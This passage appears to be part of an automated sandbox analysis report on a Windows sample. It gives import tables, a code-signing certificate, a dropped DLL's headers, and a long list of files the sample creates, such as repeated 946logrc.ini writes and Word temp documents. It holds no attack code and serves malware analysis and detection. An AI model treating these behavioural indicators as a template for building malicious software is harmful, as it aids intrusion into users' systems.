StretchBlt | 0x0 | 0x4900f0 | 0xbd338 | 0xbbf38 | 0x2b3 |
GetDIBits | 0x0 | 0x4900f4 | 0xbd33c | 0xbbf3c | 0x1ca |
LineTo | 0x0 | 0x4900f8 | 0xbd340 | 0xbbf40 | 0x236 |
AngleArc | 0x0 | 0x4900fc | 0xbd344 | 0xbbf44 | 0x8 |
MoveToEx | 0x0 | 0x490100 | 0xbd348 | 0xbbf48 | 0x23a |
Ellipse | 0x0 | 0x490104 | 0xbd34c | 0xbbf4c | 0xed |
DeleteDC | 0x0 | 0x490108 | 0xbd350 | 0xbbf50 | 0xe3 |
GetPixel | 0x0 | 0x49010c | 0xbd354 | 0xbbf54 | 0x204 |
CreateDCW | 0x0 | 0x490110 | 0xbd358 | 0xbbf58 | 0x32 |
GetStockObject | 0x0 | 0x490114 | 0xbd35c | 0xbbf5c | 0x20d |
GetTextFaceW | 0x0 | 0x490118 | 0xbd360 | 0xbbf60 | 0x224 |
CreateFontW | 0x0 | 0x49011c | 0xbd364 | 0xbbf64 | 0x41 |
SetTextColor | 0x0 | 0x490120 | 0xbd368 | 0xbbf68 | 0x2a6 |
PolyDraw | 0x0 | 0x490124 | 0xbd36c | 0xbbf6c | 0x250 |
BeginPath | 0x0 | 0x490128 | 0xbd370 | 0xbbf70 | 0x12 |
Rectangle | 0x0 | 0x49012c | 0xbd374 | 0xbbf74 | 0x25f |
SetViewportOrgEx | 0x0 | 0x490130 | 0xbd378 | 0xbbf78 | 0x2a9 |
GetObjectW | 0x0 | 0x490134 | 0xbd37c | 0xbbf7c | 0x1fd |
SetBkMode | 0x0 | 0x490138 | 0xbd380 | 0xbbf80 | 0x27f |
RoundRect | 0x0 | 0x49013c | 0xbd384 | 0xbbf84 | 0x26a |
SetBkColor | 0x0 | 0x490140 | 0xbd388 | 0xbbf88 | 0x27e |
CreatePen | 0x0 | 0x490144 | 0xbd38c | 0xbbf8c | 0x4b |
CreateSolidBrush | 0x0 | 0x490148 | 0xbd390 | 0xbbf90 | 0x54 |
StrokeAndFillPath | 0x0 | 0x49014c | 0xbd394 | 0xbbf94 | 0x2b5 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetOpenFileNameW | 0x0 | 0x4900b8 | 0xbd300 | 0xbbf00 | 0xc |
GetSaveFileNameW | 0x0 | 0x4900bc | 0xbd304 | 0xbbf04 | 0xe |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetAce | 0x0 | 0x490000 | 0xbd248 | 0xbbe48 | 0x123 |
RegEnumValueW | 0x0 | 0x490004 | 0xbd24c | 0xbbe4c | 0x252 |
RegDeleteValueW | 0x0 | 0x490008 | 0xbd250 | 0xbbe50 | 0x248 |
RegDeleteKeyW | 0x0 | 0x49000c | 0xbd254 | 0xbbe54 | 0x244 |
RegEnumKeyExW | 0x0 | 0x490010 | 0xbd258 | 0xbbe58 | 0x24f |
RegSetValueExW | 0x0 | 0x490014 | 0xbd25c | 0xbbe5c | 0x27e |
RegOpenKeyExW | 0x0 | 0x490018 | 0xbd260 | 0xbbe60 | 0x261 |
RegCloseKey | 0x0 | 0x49001c | 0xbd264 | 0xbbe64 | 0x230 |
RegQueryValueExW | 0x0 | 0x490020 | 0xbd268 | 0xbbe68 | 0x26e |
RegConnectRegistryW | 0x0 | 0x490024 | 0xbd26c | 0xbbe6c | 0x234 |
InitializeSecurityDescriptor | 0x0 | 0x490028 | 0xbd270 | 0xbbe70 | 0x177 |
InitializeAcl | 0x0 | 0x49002c | 0xbd274 | 0xbbe74 | 0x176 |
AdjustTokenPrivileges | 0x0 | 0x490030 | 0xbd278 | 0xbbe78 | 0x1f |
OpenThreadToken | 0x0 | 0x490034 | 0xbd27c | 0xbbe7c | 0x1fc |
OpenProcessToken | 0x0 | 0x490038 | 0xbd280 | 0xbbe80 | 0x1f7 |
LookupPrivilegeValueW | 0x0 | 0x49003c | 0xbd284 | 0xbbe84 | 0x197 |
DuplicateTokenEx | 0x0 | 0x490040 | 0xbd288 | 0xbbe88 | 0xdf |
CreateProcessAsUserW | 0x0 | 0x490044 | 0xbd28c | 0xbbe8c | 0x7c |
CreateProcessWithLogonW | 0x0 | 0x490048 | 0xbd290 | 0xbbe90 | 0x7d |
GetLengthSid | 0x0 | 0x49004c | 0xbd294 | 0xbbe94 | 0x136 |
CopySid | 0x0 | 0x490050 | 0xbd298 | 0xbbe98 | 0x76 |
LogonUserW | 0x0 | 0x490054 | 0xbd29c | 0xbbe9c | 0x18d |
AllocateAndInitializeSid | 0x0 | 0x490058 | 0xbd2a0 | 0xbbea0 | 0x20 |
CheckTokenMembership | 0x0 | 0x49005c | 0xbd2a4 | 0xbbea4 | 0x51 |
RegCreateKeyExW | 0x0 | 0x490060 | 0xbd2a8 | 0xbbea8 | 0x239 |
FreeSid | 0x0 | 0x490064 | 0xbd2ac | 0xbbeac | 0x120 |
GetTokenInformation | 0x0 | 0x490068 | 0xbd2b0 | 0xbbeb0 | 0x15a |
GetSecurityDescriptorDacl | 0x0 | 0x49006c | 0xbd2b4 | 0xbbeb4 | 0x148 |
GetAclInformation | 0x0 | 0x490070 | 0xbd2b8 | 0xbbeb8 | 0x124 |
AddAce | 0x0 | 0x490074 | 0xbd2bc | 0xbbebc | 0x16 |
SetSecurityDescriptorDacl | 0x0 | 0x490078 | 0xbd2c0 | 0xbbec0 | 0x2b6 |
GetUserNameW | 0x0 | 0x49007c | 0xbd2c4 | 0xbbec4 | 0x165 |
InitiateSystemShutdownExW | 0x0 | 0x490080 | 0xbd2c8 | 0xbbec8 | 0x17d |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
DragQueryPoint | 0x0 | 0x49048c | 0xbd6d4 | 0xbc2d4 | 0x20 |
ShellExecuteExW | 0x0 | 0x490490 | 0xbd6d8 | 0xbc2d8 | 0x121 |
DragQueryFileW | 0x0 | 0x490494 | 0xbd6dc | 0xbc2dc | 0x1f |
SHEmptyRecycleBinW | 0x0 | 0x490498 | 0xbd6e0 | 0xbc2e0 | 0xa5 |
SHGetPathFromIDListW | 0x0 | 0x49049c | 0xbd6e4 | 0xbc2e4 | 0xd7 |
SHBrowseForFolderW | 0x0 | 0x4904a0 | 0xbd6e8 | 0xbc2e8 | 0x7b |
SHCreateShellItem | 0x0 | 0x4904a4 | 0xbd6ec | 0xbc2ec | 0x9a |
SHGetDesktopFolder | 0x0 | 0x4904a8 | 0xbd6f0 | 0xbc2f0 | 0xb6 |
SHGetSpecialFolderLocation | 0x0 | 0x4904ac | 0xbd6f4 | 0xbc2f4 | 0xdf |
SHGetFolderPathW | 0x0 | 0x4904b0 | 0xbd6f8 | 0xbc2f8 | 0xc3 |
SHFileOperationW | 0x0 | 0x4904b4 | 0xbd6fc | 0xbc2fc | 0xac |
ExtractIconExW | 0x0 | 0x4904b8 | 0xbd700 | 0xbc300 | 0x2a |
Shell_NotifyIconW | 0x0 | 0x4904bc | 0xbd704 | 0xbc304 | 0x12e |
ShellExecuteW | 0x0 | 0x4904c0 | 0xbd708 | 0xbc308 | 0x122 |
DragFinish | 0x0 | 0x4904c4 | 0xbd70c | 0xbc30c | 0x1b |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CoTaskMemAlloc | 0x0 | 0x490828 | 0xbda70 | 0xbc670 | 0x67 |
CoTaskMemFree | 0x0 | 0x49082c | 0xbda74 | 0xbc674 | 0x68 |
CLSIDFromString | 0x0 | 0x490830 | 0xbda78 | 0xbc678 | 0x8 |
ProgIDFromCLSID | 0x0 | 0x490834 | 0xbda7c | 0xbc67c | 0x14b |
CLSIDFromProgID | 0x0 | 0x490838 | 0xbda80 | 0xbc680 | 0x6 |
OleSetMenuDescriptor | 0x0 | 0x49083c | 0xbda84 | 0xbc684 | 0x147 |
MkParseDisplayName | 0x0 | 0x490840 | 0xbda88 | 0xbc688 | 0xd4 |
OleSetContainedObject | 0x0 | 0x490844 | 0xbda8c | 0xbc68c | 0x146 |
StringFromGUID2 | 0x0 | 0x490848 | 0xbda90 | 0xbc690 | 0x179 |
CreateStreamOnHGlobal | 0x0 | 0x49084c | 0xbda94 | 0xbc694 | 0x86 |
OleInitialize | 0x0 | 0x490850 | 0xbda98 | 0xbc698 | 0x132 |
OleUninitialize | 0x0 | 0x490854 | 0xbda9c | 0xbc69c | 0x149 |
CoInitialize | 0x0 | 0x490858 | 0xbdaa0 | 0xbc6a0 | 0x3e |
CoCreateInstance | 0x0 | 0x49085c | 0xbdaa4 | 0xbc6a4 | 0x10 |
CoUninitialize | 0x0 | 0x490860 | 0xbdaa8 | 0xbc6a8 | 0x6c |
GetRunningObjectTable | 0x0 | 0x490864 | 0xbdaac | 0xbc6ac | 0x97 |
CoGetInstanceFromFile | 0x0 | 0x490868 | 0xbdab0 | 0xbc6b0 | 0x2d |
CoGetObject | 0x0 | 0x49086c | 0xbdab4 | 0xbc6b4 | 0x35 |
CoInitializeSecurity | 0x0 | 0x490870 | 0xbdab8 | 0xbc6b8 | 0x40 |
IIDFromString | 0x0 | 0x490874 | 0xbdabc | 0xbc6bc | 0xcd |
CoSetProxyBlanket | 0x0 | 0x490878 | 0xbdac0 | 0xbc6c0 | 0x63 |
CoCreateInstanceEx | 0x0 | 0x49087c | 0xbdac4 | 0xbc6c4 | 0x11 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CreateDispTypeInfo | 0x1f | 0x49040c | 0xbd654 | 0xbc254 | - |
VariantCopyInd | 0xb | 0x490410 | 0xbd658 | 0xbc258 | - |
SysReAllocString | 0x3 | 0x490414 | 0xbd65c | 0xbc25c | - |
SysFreeString | 0x6 | 0x490418 | 0xbd660 | 0xbc260 | - |
SafeArrayDestroyDescriptor | 0x26 | 0x49041c | 0xbd664 | 0xbc264 | - |
SafeArrayDestroyData | 0x27 | 0x490420 | 0xbd668 | 0xbc268 | - |
SafeArrayUnaccessData | 0x18 | 0x490424 | 0xbd66c | 0xbc26c | - |
SafeArrayAccessData | 0x17 | 0x490428 | 0xbd670 | 0xbc270 | - |
SafeArrayAllocData | 0x25 | 0x49042c | 0xbd674 | 0xbc274 | - |
SafeArrayAllocDescriptorEx | 0x29 | 0x490430 | 0xbd678 | 0xbc278 | - |
SafeArrayCreateVector | 0x19b | 0x490434 | 0xbd67c | 0xbc27c | - |
CreateStdDispatch | 0x20 | 0x490438 | 0xbd680 | 0xbc280 | - |
VarR8FromDec | 0xdc | 0x49043c | 0xbd684 | 0xbc284 | - |
SafeArrayGetVartype | 0x4d | 0x490440 | 0xbd688 | 0xbc288 | - |
OleLoadPicture | 0x1a2 | 0x490444 | 0xbd68c | 0xbc28c | - |
QueryPathOfRegTypeLib | 0xa4 | 0x490448 | 0xbd690 | 0xbc290 | - |
LoadTypeLibEx | 0xb7 | 0x49044c | 0xbd694 | 0xbc294 | - |
RegisterTypeLib | 0xa3 | 0x490450 | 0xbd698 | 0xbc298 | - |
RegisterTypeLibForUser | 0x1ba | 0x490454 | 0xbd69c | 0xbc29c | - |
VariantCopy | 0xa | 0x490458 | 0xbd6a0 | 0xbc2a0 | - |
VariantClear | 0x9 | 0x49045c | 0xbd6a4 | 0xbc2a4 | - |
UnRegisterTypeLibForUser | 0x1bb | 0x490460 | 0xbd6a8 | 0xbc2a8 | - |
UnRegisterTypeLib | 0xba | 0x490464 | 0xbd6ac | 0xbc2ac | - |
DispCallFunc | 0x92 | 0x490468 | 0xbd6b0 | 0xbc2b0 | - |
VariantChangeType | 0xc | 0x49046c | 0xbd6b4 | 0xbc2b4 | - |
SysStringLen | 0x7 | 0x490470 | 0xbd6b8 | 0xbc2b8 | - |
VariantTimeToSystemTime | 0xb9 | 0x490474 | 0xbd6bc | 0xbc2bc | - |
SysAllocString | 0x2 | 0x490478 | 0xbd6c0 | 0xbc2c0 | - |
VariantInit | 0x8 | 0x49047c | 0xbd6c4 | 0xbc2c4 | - |
Issued by | AutoIt Consulting Ltd |
Parent Certificate | GlobalSign CodeSigning CA - SHA256 - G3 |
Country Name | GB |
Valid From | 2018-01-24 09:39:13+00:00 |
Valid Until | 2020-07-04 06:50:17+00:00 |
Algorithm | sha256_rsa |
Serial Number | 42 F7 CE C0 08 6A C8 87 BB 81 BA 16 |
Thumbprint | 6D A9 2F 8A 43 63 0D E4 66 A2 1B B8 2A F0 5B 5A 0D 5A 33 97 |
Issued by | GlobalSign CodeSigning CA - SHA256 - G3 |
Country Name | BE |
Valid From | 2016-06-15 00:00:00+00:00 |
Valid Until | 2024-06-15 00:00:00+00:00 |
Algorithm | sha256_rsa |
Serial Number | 48 1B 6A 07 26 D2 E8 3F 26 02 D4 82 5A CD |
Thumbprint | 09 0D 03 43 5E B2 A8 36 4F 79 B7 8C B1 73 D3 5E 8E B6 35 58 |
C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.tmp | Created File | Unknown |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.dll | Created File | Binary |
Not Queried
|
...
|
Image Base | 0x400000 |
Entry Point | 0x402a0e |
Size Of Code | 0xc00 |
Size Of Initialized Data | 0x600 |
File Type | dll |
Subsystem | windows_cui |
Machine Type | i386 |
Compile Timestamp | 2019-02-11 09:18:18+00:00 |
Assembly Version | 0.0.0.0 |
LegalCopyright | |
InternalName | atsamxnv.dll |
FileVersion | 0.0.0.0 |
ProductVersion | 0.0.0.0 |
FileDescription | |
OriginalFilename | atsamxnv.dll |
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x402000 | 0xa14 | 0xc00 | 0x200 | cnt_code, mem_execute, mem_read | 4.68 |
.rsrc | 0x404000 | 0x2a8 | 0x400 | 0xe00 | cnt_initialized_data, mem_read | 2.17 |
.reloc | 0x406000 | 0xc | 0x200 | 0x1200 | cnt_initialized_data, mem_discardable, mem_read | 0.08 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
_CorDllMain | 0x0 | 0x402000 | 0x29e4 | 0xbe4 | 0x0 |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.word\~$ro0000.doc | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logim.jpeg | Created File | Image |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrv.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.word\~wro0000.doc | Created File | Word Document |
Not Queried
|
...
|
Revision | 1 |
Create Time | 2019-02-11 04:16:00+00:00 |
Application | Microsoft Office Word |
App Version | 16.0000 |
Template | Normal.dotm |
Document Security | SecurityFlag.NONE |
Page Count | 1 |
ScaleCrop | |
SharedDoc |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.out | Created File | Text |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.0.cs | Created File | Text |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logri.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream |
Not Queried
|
...
|
b725d5476e76f555fc24ecb908474fd29b671687336e5e1177a5c4c35cb5939f | Embedded File | XML |
Not Queried
|
...
|
f6dd369a94b5de69ef36f791f233114a80259b3e4e56c5a5356242b050e86550 | Embedded File | XML |
Not Queried
|
...
|
bd2cb39c79a30d6942015dd24ea7ca012018a010cbd40eb98994354b3b892b2a | Embedded File | XML |
Not Queried
|
...
|